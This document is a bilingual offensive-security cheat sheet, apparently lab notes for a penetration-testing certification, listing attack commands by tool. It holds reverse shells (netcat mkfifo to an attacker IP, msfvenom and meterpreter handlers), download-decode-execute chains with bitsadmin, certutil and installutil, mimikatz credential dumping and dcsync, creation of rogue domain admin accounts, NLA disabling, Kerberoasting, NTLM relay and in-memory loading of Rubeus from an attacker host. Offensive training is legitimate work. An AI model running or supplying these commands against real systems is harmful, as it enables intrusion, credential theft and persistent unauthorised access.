Tools

bash

# View apache logs
sudo tail -f /var/log/apache2/access.log

# Find private ssh keys (id_rsa) in home directories
find /home/ -name "id_rsa"

# Descargar fichero de clave ssh por scp
scp linuxvictim@linuxvictim:svuser.key ./

# Buscar fichero de cache kerberos en linux
sudo find / -name "*krb5cc*"

# comprobar versión y arquitectura de linux
uname -m
cat /etc/issue
# x86_64: para sistemas de 64 bits basados en Intel o AMD.
# i386 o i686: para sistemas de 32 bits basados en Intel o AMD.
# armv7l: para sistemas de 32 bits basados en ARM.
# aarch64: para sistemas de 64 bits basados en ARM.

# Who else is on this box (lateral movement)?
ls -la /home
cat /etc/passwd

# What executables have SUID bit that can be executed as another user?
find / -type f -user root -perm /u+s -ls 2>/dev/null

# Privilege escalation
sudo -l
cat /etc/sudoers
cat /etc/sudoers.d

# imprimir hora del sistema
date +"%b %d %T"

bitsadmin

# Transfer
bitsadmin /Transfer myJob http://<attacker-ip>/bypass-clm.txt C:\Windows\Tasks\bypass-clm.txt

# Transfer, Decode and Execute
bitsadmin /Transfer myJob http://<attacker-ip>/bypass-clm.txt C:\Windows\Tasks\bypass-clm.txt && certutil -decode C:\Windows\Tasks\bypass-clm.txt C:\Windows\Tasks\bypass-clm.exe && del C:\Windows\Tasks\bypass-clm.txt && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\bypass-clm.exe

certutil

# Encode EXE to B64
certutil -encode \\<attacker-ip>\visualstudio\CLMBypass\bin\Release\CLMBypass.exe \\<attacker-ip>\visualstudio\CLMBypass\bin\Release\CLMBypass.txt
certutil -encode \\<attacker-ip>\visualstudio\bypass-clm\bypass-clm\bin\x64\Release\bypass-clm.exe \\<attacker-ip>\visualstudio\bypass-clm\bypass-clm\bin\x64\Release\bypass-clm.txt

# Decode B64 to EXE
certutil -decode C:\Windows\Tasks\bypass-clm.txt C:\Windows\Tasks\bypass-clm.exe # installutil

chisel



# Habilitar autenticación de contraseña
sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/g' /etc/ssh/sshd_config

# Iniciar el servicio ssh (si ya estaba activo, hace falta un restart para aplicar el cambio de sshd_config)
sudo systemctl start ssh.service

# sudo nano /etc/proxychains.conf
socks5 127.0.0.1 1080


chisel server -p 8080 --socks5 --reverse

./chisel.exe client <attacker-ip>:8080 R:1080:socks

cmd

# View privileges of the current user - SeImpersonatePrivilege is a high-value privilege
whoami /priv

# View the domain groups of a user
net user ted /domain | find "Group"

# Create a domain admin user with RDP
net user <username> <password> /add /domain
net localgroup "Remote Desktop Users" <username> /add /domain
net group "domain admins" <username> /add /domain

# CLM Bypass
C:\Windows\Tasks\bypass-clm.exe

# InstallUtil
# To find InstallUtil Path
dir \Windows\Microsoft.NET\* /s/b | findstr InstallUtil.exe$

# Execute InstallUtils
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\CustomRunspace.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\CLMBypass.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\bypass-clm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\SpoolSample.exe dc03.<domain> web05.<domain>
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\chisel.exe



# Deshabilitar NLA (Autenticación a nivel de red) para conectar por RDP sin problemas
reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

# Ver GPO politicas que aplican (o no) a mi equipo
gpresult /r /Scope Computer

# (comando duplicado: es la misma edición del registro que deshabilita NLA de arriba; la consulta de GPO es `gpresult /r /Scope Computer`)
reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

sc create mimidrv binPath= C:\Windows\Tasks\vmimidrv.sys type= kernel start= demand
sc start mimidrv

crackmapexec

# Check if SMB (Samba) is enabled and extract the NetBIOS name
crackmapexec smb <victim-ip> # -u <username> -p '<password>'

# Check if SMB (Samba) is enabled and extract the NetBIOS name for the whole subnet
crackmapexec smb 172.16.218.0/24

dotnettojscript

DotNetToJScript.exe \\<attacker-ip>\visualstudio\DotNetToJScript\ExampleAssembly\bin\Release\ExampleAssembly.dll --lang=Jscript --ver=v4 -o shell.js

evil-winrm

evil-winrm -u <domain>\\administrator -H <NTLM-hash> -i <victim-ip>

gcc

gcc -static shell.c -o shell.elf
upx -9 shell.elf

gobuster

# Common directories on root
gobuster dir -u http://<victim-ip> -w /home/<username>/.fuzz/dirb/common_4459.txt -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -e -t 23 -o xx_root_directories.fuzz

# Common files and directories on root
gobuster dir -u http://<victim-ip> -w /home/<username>/.fuzz/dirb/common_4459.txt -a "Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0" -e -t 23 -x .php,.html,.txt -o xx_root_files_directories.fuzz

hashcat

# Descifrar hash NetNTLMv2 (modo 5600)
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force 

# Descifrar hash de Ansible Vault (modo 16900)
hashcat -m 16900 hash.txt /usr/share/wordlists/rockyou.txt --force 

# Kerberos 5 TGS-REP (modo 13100)
hashcat hashes.txt -m 13100 -a 3

# Buscar el ID de modo (-m) de un hash
https://hashcat.net/wiki/doku.php?id=example_hashes

hostrecon

. .\HostRecon.ps1
Invoke-HostRecon
Invoke-HostRecon | Out-File C:\Windows\Tasks\HostRecon.txt

impacket

# Obtener todos los usuarios del dominio, sin pedir pass y usando autenticación kerberos
GetADUsers.py -all -k -no-pass -dc-ip <victim-ip> <domain>/<username>

GetUserSPNs.py -request -k -no-pass -dc-ip <victim-ip> <domain>/<username>

GetNPUsers.py -k -no-pass -dc-ip <victim-ip> <domain>/<username> -usersfile users -format john -outputfile hashes

johntheripper

# Descargar clave por ssh
scp <username>@<victim-ip>:/home/<username>/.ssh/id_rsa ./

# Convertir clave a formato legible por johntheripper
python /usr/share/john/ssh2john.py id_rsa > <username>.hash

# Fuerza bruta
sudo john --wordlist=/usr/share/wordlists/rockyou.txt svuser.hash

metasploit

meterpreter

# View channels
channel -l



# Get Username
getuid

# Migrate the session into another process (explorer, w3wp or spoolsv)
migrate -N explorer.exe
migrate -N w3wp.exe
migrate -N spoolsv.exe

# Create a hidden notepad process and migrate into it
execute -H -f notepad
migrate XXXX

# Search file
search -f local.txt

# Enum LAPS
run post/windows/gather/credentials/enum_laps

msfconsole

# Windows 32 bits (para Word)
sudo msfconsole -q -x "use multi/handler; set payload windows/meterpreter/reverse_https; set exitfunc thread; set lhost <attacker-ip>; set lport 443; exploit"

# Windows 64 bits
sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_https; set lhost <attacker-ip>; set lport 443; exploit"

# Linux
# Atención a `MeterpreterTryToFork true` esto permite hacer algo similar a migrate en Windows, además, permite hacer uso del comando shell
sudo msfconsole -q -x "use multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost <attacker-ip>; set lport 443; set MeterpreterTryToFork true; exploit"

# Create workspace
workspace -a [WORKSPACE]

# Import from nmap
db_import all.xml

# Ver o añadir hosts
hosts
hosts -a [IP]

msfvenom

# 32 bits (para Word)
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=<attacker-ip> LPORT=443 EXITFUNC=thread -f csharp

# 64 bits
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker-ip> LPORT=443 -f exe -o /var/www/html/shell.exe

# ASPX
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker-ip> LPORT=443 -f aspx -o /var/www/html/shell.aspx

# Linux
# La opcion `-k MeterpreterTryToFork=true` hace algo similar a migrate en windows, además, permite usar el comando shell
sudo msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=443 -k MeterpreterTryToFork=true -f c

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<attacker-ip> LPORT=443 -f raw -o shell.bin

mimikatz



# Obtener NTLM de administrador del dominio en Web05
C:\Windows\Tasks\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:<domain> /user:administrator /csv" "exit"

C:\Windows\Tasks\mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"

C:\Windows\Tasks\mimikatz.exe "token::elevate" "lsadump::secrets" "exit"

./mimikatz.exe "lsadump::lsa /patch" "exit"

mssql

Connect with windows-auth

mssqlclient.py <username>:<password>@<victim-ip> -port 1433 -windows-auth

Connect with password

mssqlclient.py <username>@<victim-ip> # 8<password>

netcat nc

# Listener
rlwrap -cAr nc -lvnp 443
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker-ip> 443 >/tmp/f

# Compartir un fichero por netcat nc
# Atacante
cd /var/www/html
nc -nlvp 443 < /var/www/html/chisel

# Víctima
cat > chisel < /dev/tcp/<attacker-ip>/443
chmod +x chisel

# Comprobar
md5sum chisel

# Pasar archivo de windows a linux
# linux para recibir archivo
nc -lp 1234 > mimi.txt
# windows para enviar
nc.exe <attacker-ip> 1234 < mimi.txt
# IMPORTANTE, CERRAR LA CONEXIÓN DESDE LINUX (EL RECEPTOR)

nmap

# Escaneo de versión con scripts a todos los puertos, tratar a todos como online, deteccion de sistema operativo, minimo de paquetes por segundo
nmap -sT -sC -sV -p- -Pn -A -vvv -T3 --min-rate=1000 -oA nmap/all -iL scope.txt

# Escanear subred
# Obtener información de netbios
nmap -sTV -A -Pn -A -p 3389 -vvv -oA nmap/subred 172.16.237.160,165,166,167,168 # super rápido
nmap -sTV -A -Pn --top-ports 25 -vvv -oA nmap/subred 172.16.237.160,165,166,167,168
nmap -sTV -A -Pn --top-ports 25 --min-rate=1000 -T5 -vvv -oA nmap/subred 172.16.237.160,165,166,167,168 # esto funciona pero mete mucha caña y se puede caer la conexion
# con proxychains
proxychains -q nmap -sT -Pn -n --top-ports 25 -T3 --min-rate=1000 -vvv -oA nmap/subred 172.16.237.150

ntlmrelayx

ntlmrelayx.py --no-http-server -smb2support -t smb://172.16.183.152

lapstoolkit

# Import
. .\LAPSToolkit.ps1
Import-Module .LAPSToolkit.ps1

# Discovers LAPS Delegated Groups
Find-LAPSDelegatedGroups

# Checks the rights on each computer with LAPS enabled for any groups with read access and users with `All Extended Rights`
Find-AdmPwdExtendedRights

# Find computers with LAPS enabled, discover password expiration and can discover randomized password
Get-LAPSComputers

ldapsearch

# dump users
ldapsearch -Y GSSAPI -H ldap://dmzdc01.<domain> -D "<username>@<domain>" -W -b "dc=<base-domain>,dc=com" '(&(objectClass=user))'

ldapsearch -Y GSSAPI -H ldap://dmzdc01.<domain> -D "<username>@<domain>" -W -b "dc=<base-domain>,dc=com" "servicePrincipalName=*" servicePrincipalName

linpeas

# Grabar sesión de terminal
script -t 2> timing.log -a session.log # Despues lanzar comando y Ctrl + D para parar
scp <username>@<victim-ip>:session.log ./
cat session.log | aha --black --title "Terminal Session USER MACHINE" > linpeas_<username>_<machine>.html
rm timing.log session.log

powermad

# importar


# create a machine account for an RBCD attack
New-MachineAccount -MachineAccount <username> -Password $(ConvertTo-SecureString '<password>' -AsPlainText -Force) -Verbose

PowerShell

Add domain admin

net user <username> <password> /add /domain
net localgroup "Remote Desktop Users" <username> /add /domain
net group "domain admins" <username> /add /domain
runas /user:<username> "Powershell.exe /c whoami"
rdesktop -a 8 -z -x l -u <username> -p <password> -d <domain> -g 1366x768 <victim-ip> -r sound:off -r clipboard:CLIPBOARD -r disk:home=/home/<username>/osep

Add local admin with RDP

net user <username> <password> /add
net localgroup Administrators <username> /add
net localgroup "Remote Desktop Users" <username> /add
runas /user:<username> "Powershell.exe /c whoami"
rdesktop -a 8 -z -x l -u <username> -p <password> -g 1366x768 <victim-ip> -r sound:off -r clipboard:CLIPBOARD -r disk:home=/home/<username>/osep

Change user password

$creds = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", (ConvertTo-SecureString "<password>" -AsPlainText -Force)) 
$UserPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force 
Set-DomainUserPassword -Identity <username> -AccountPassword $UserPassword -Credential $creds -Verbose 

Change user password and cover

$remote = New-Object System.Management.Automation.PSCredential ("<domain>\<username>", (ConvertTo-SecureString "<password>" -AsPlainText -Force)) 
$creds = ConvertTo-SecureString '<password>' -AsPlainText -Force 
Set-DomainUserPassword -Identity <username> -AccountPassword $creds -Credential $remote -Verbose 

Check 64-bit OS

[Environment]::Is64BitOperatingSystem

Check CLM

$ExecutionContext.SessionState.LanguageMode

Enable PSRemoting

Enable-PSRemoting -Force

Load Assembly

$data = (New-Object System.Net.WebClient).DownloadData('http://<attacker-ip>/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Rubeus.Program]::Main("s4u /user:<username>$ /rc4:<rc4> /impersonateuser:administrator /msdsspn:cifs/file01 /ptt".Split())

Run DLL

Rundll32 c:\windows\tasks\shell.dll,run

Runas

runas /user:<domain>\<username> powershell
